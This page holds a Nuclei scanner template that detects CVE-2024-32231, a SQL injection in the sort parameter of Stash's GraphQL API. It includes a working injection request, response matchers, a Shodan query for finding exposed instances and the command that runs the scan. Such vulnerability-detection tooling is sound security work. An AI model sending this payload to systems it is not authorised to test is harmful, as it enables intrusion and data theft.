Skip to content
Nuclei Templates

Stash < 0.26.0 - SQL Injection

ID: CVE-2024-32231

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,stash,sqli

Description

Section titled “Description”

Stash up to v0.25.1 was discovered to contain a SQL injection vulnerability via the sort parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2024-32231


info:
  name: Stash < 0.26.0 -  SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Stash up to v0.25.1 was discovered to contain a SQL injection vulnerability via the sort parameter.
  reference:
    - https://github.com/stashapp
    - https://github.com/stashapp/stash
    - https://github.com/stashapp/stash/pull/4865
    - https://github.com/advisories/GHSA-75jf-52jg-qqh4
    - https://nvd.nist.gov/vuln/detail/CVE-2024-32231
  classification:
    cve-id: CVE-2024-32231
    epss-score: 0.00045
    epss-percentile: 0.16348
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"<title>Stash</title>"
  tags: cve,cve2024,stash,sqli


http:
  - raw:
      - |
        POST /graphql HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/json


        {"operationName":"FindPerformers","variables":{"filter":{"q":"","page":1,"per_page":40,"sort":"name;select performers.id FROM performers union select group_concat(sqlite_version(),':')-- -","direction":"ASC"},"performer_filter":{}},"query":"query FindPerformers($filter: FindFilterType, $performer_filter: PerformerFilterType, $performer_ids: [Int!]) {\n  findPerformers(\n    filter: $filter\n    performer_filter: $performer_filter\n    performer_ids: $performer_ids\n  ) {\n    count\n    performers {\n      ...PerformerData\n      __typename\n    }\n    __typename\n  }\n}\n\nfragment PerformerData on Performer {\n  id\n  name\n  disambiguation\n  url\n  gender\n  twitter\n  instagram\n  birthdate\n  ethnicity\n  country\n  eye_color\n  height_cm\n  measurements\n  fake_tits\n  penis_length\n  circumcised\n  career_length\n  tattoos\n  piercings\n  alias_list\n  favorite\n  ignore_auto_tag\n  image_path\n  scene_count\n  image_count\n  gallery_count\n  movie_count\n  performer_count\n  o_counter\n  tags {\n    ...SlimTagData\n    __typename\n  }\n  stash_ids {\n    stash_id\n    endpoint\n    __typename\n  }\n  rating100\n  details\n  death_date\n  hair_color\n  weight\n  __typename\n}\n\nfragment SlimTagData on Tag {\n  id\n  name\n  aliases\n  image_path\n  parent_count\n  child_count\n  __typename\n}"}


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'converting driver\.Value type string \(\\"3.*?\\"\) to a int: invalid syntax'


      - type: word
        part: content_type
        words:
          - "application/json"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022060abfa2b333b321723e13021654ec2c0efcf8308262b999bc42ff58373721db5022100e2b46793f9e938c31738104d159088906a7ef729a3b51cd85de3301b7dd32231:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-32231.yaml"

View on Github